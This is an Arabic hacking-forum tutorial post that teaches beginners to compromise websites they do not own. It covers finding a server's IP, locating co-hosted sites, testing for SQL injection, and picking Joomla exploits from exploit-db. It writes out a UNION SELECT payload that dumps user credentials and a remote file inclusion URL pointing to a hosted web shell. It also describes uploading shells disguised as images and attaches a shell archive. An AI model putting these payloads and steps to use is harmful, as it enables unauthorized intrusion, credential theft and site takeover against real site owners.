السلام عليكم ورحمة الله وبركاته طبعا بعد غياب طويل عن المنتدى لاخذ دورات في هكر وقد تخطيت مرحلة الابتدائية واصبحت في المتوسطة في الهكر احب اعطي الدروس اللي تخليك تطلع من الابتدائية ! 1-انا ادور بقوقل رفع الشل اكتب رفع الشل يطلعلي ثغرات ياخي شهالحال ؟ اوك انا اقولك شسالفه! الثغرات انواع : 1-الفايل انكلود 2-الفايل ابلود sql xss هذول اللي انا بخترق فيهم طبعا في ملياان انواع ثغرات بس هذول موجودين باغلب المواقع طيب لورد هوا انا علي احفظ هاد كلو ؟؟ طيب لورد والله هيك صعب! ياخي انا ماقلتلك احفظ طبعا معروف انو في موقع للثغرات اسمو ميلورم (وتسكر) نزل بديل بس هاد البديل فيه كل ثغارت الميلورم ومطور اكتر http://www.exploit-db.com/ طبعا طرق الاستغلال نفسها للي كان يعرف الموقع القديم واللي ما يعرف مممم؟؟؟؟ منعلمو ^_^ طبعا جميع الحقوق محفوظه لمنتديات جيوش الهكرز طبعا من كثر ما دورت شروحات اشوف انو احيانا الصور ما تظهر لذلك رح اشرح كتابة وصور ^_^ صورة الموقع طيب اول شي رح نشرح كيف نشوف الثغرة الللي بدنا ياها مندخل الموقع اللي بدنا نخترقو اذا ما كان مركب سكربت شو نعمل نقفل ! لالا اوعى منطلع الاي بي تبع السيرفر ممم كيف؟ انا بقلك افتح رن او تشغيل او شاشة الدوس مثل ما بقولو اكتب cmd jفتح عندك شاشة الاوامر لا لورد تكفى لا تفوتنا بالحيط ما بدنا اوامر ياعمي اهدى بس انسخ والصق انت وما عليك لما تفتح الشاشة السودة اكتب او انسخ ping google.com طيب مكان google.com منحط موقعنا مثلا بدنا نخترق يوتيوب منحط الموقع بدون www بتصير هيك ping youtube.com لاتنسو الفراغ اللي بالنص بيطلعلك الاي بي متل هيك غلطبت بالنسخ انا سموحة يالاعضاء لنسخ الايبي رايت كلك تحديد علامة بعدين من زاوية نافذه الشاشة السودة رايت كلك بعدين تحرير بعدبن نسخ ^_^ يالله والله تعبت من الكتابة يالله لعيون الاعضاء منكمل طيب لورد شو بفيدنا اي بي السيرفر ؟ انا بقلك بفيدك انك بتقدر تطلع السكربتات اللي مركبها على موقعو او مواقع من سيرفرو وين نروح ؟ روح www.msn.com شو اسوي هناك ؟ حط هيك ip :74.125.127.93 id الشرح ip :74.125.127.93 معناتها اي بي السيرفر id عشان نشوف مصاب بالsql لو بدنا نعرف مصاب ولا لا منحط ورا id=1مثلا علامة ' بس ورح يطلعلك سيكيو ال ايرور او تختفي صوره او تحس في تغير بالموقع طبعا للستغلال رح ريحك من الاستغلال اليدوي نزل برنامج هافيج واكتب شرحو موجود بالمنتدى جيوش الهكرز او شوفو على قوقل طيب لو مو مصاب نقعد ندور على سكربتات مركبة بالموقع كيف ؟ ممم ادخل الموقع دور بالصفحات بلكي تلاقي سكربت جوملا او وورد بريس او ديجي شات مليان ثغرات طيب لنفترض انو لقينا ثغرة جوملا شو نعمل انا بقلك روح exploit-db.com في search اضغط عليها وتابع تكفون عطوني استراحة طيب بعد ما حطينا سيرش طلعلنا الثغرات شباب لا تروحو استنو انا عارف انو نصكم قال زهق بكرا بكمل يعمي استنا يمكن تتعلم تخترق اليوم ^_^ هلا بطلعنا صفحه مليانة ثغرات عن السيكربتjoomla طيب كيف نستغل االله يستر انا رح اختار وحده عشوائيه بعد ما دخلنا عالثغرة اللي هيي رابطها http://www.exploit-db.com/exploits/15610/ نشوف المعطيات [+] Dork: inurl:"index.php?option=com_jeajaxeventcalendar" dork معناها انو الرابط اللي وراها نبحث عنو فقوقل او بالموقع اللي بتحب تبحث فيو ================================================== ======================== [+] exploit: http://127.168.1.1/index.php?option=...**/jos_users-- هاد الاستغلال طيب شو هاد يا لورد فهمنا مممم انا بقللكم http://127.168.1.1 معناها رابط الموقع هي الثغرة اللي بحثنا عنها /index.php?option=com_jeajaxeventcalendar حط وراها &view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users-- بصير متل هاد الرابط مثلا ادخلو استغلو ^_^ https://defend.ht/index.php?option=c...m/**/jos_users طيب هيك عرفنا نستغل ال sql والفايل انكلود يا لورد مممم والله انا تعبان بس يالله هي رابط ثغرة انكلود http://www.exploit-db.com/exploits/15814/ .:. Dork : inurl:"com_ponygallery" ################################################## ################## ===[ Exploit ]=== http://www.site.com/components/com_p...absolute_path=[shell.txt?] http://www.site.com/components/com_p...absolute_path=[shell.txt?] شو معناة هالكلام طبعا متل الشرح اللي فوق تبحث عن الدورك بس ضل شي جديد احنا هون بدنا نرفع الشل للاختراق طبعا بشدد الف مره حتى هوا كاتبلك[shell.txt معناها انو الشل لازم يكون بامتداد txtبس طبعا انا اضبطكم خدو هاد شل تكست http://www.theittihad.com/newupload/vndqilbmrjkp.txt بس ضل شي مهم جدا بدونو ولا كانك عملت شي علامة ? ? هي العلامة لازم تكون موجوده ورا لشل لنعطيكم رابط مرفوع دققيقه لنعطيكم http://www.domovina-g-hrgovi.com/adm...qilbmrjkp.txt? يالله كيفو هيك شرحنا ثغرتين صحيح طولنا بس ان شاء الله تكونو فهمتو مع اني تعبت بس رح اشرحلكم اسهل ثغرة اللي هيه فايل ابلود هي رابط ثغرة انتو افهموه لانو راسي انفجر http://www.exploit-db.com/exploits/12700/ طبعا ابحثو عن الدورك وبقللكم ارفعو الشل بامتداد jpg جميع الحـ قوق محفوظه لمنتديات اخوكم LoRd_kwk [email protected] ^_^ مرفق مع الشرح شل عشان تجربو الفايل ابلود ^_^shells.zip
القران الكريم دستور الحياة .. للتواصل على الايميل [email protected] علمتنى الأيام أن اللسان الطويــــل .. دلالة على اليد القصيرة فليس شجاعًا ذلك الكلب الذي ينبح على جثة الأسد SyRa Free 4 Evey باكـ بعد الغيبهـ سوري عالغياب Instgram :ViruS_syr FaceBook : http://www.facebook.com/Virus.Syr
قوانين المنتدى
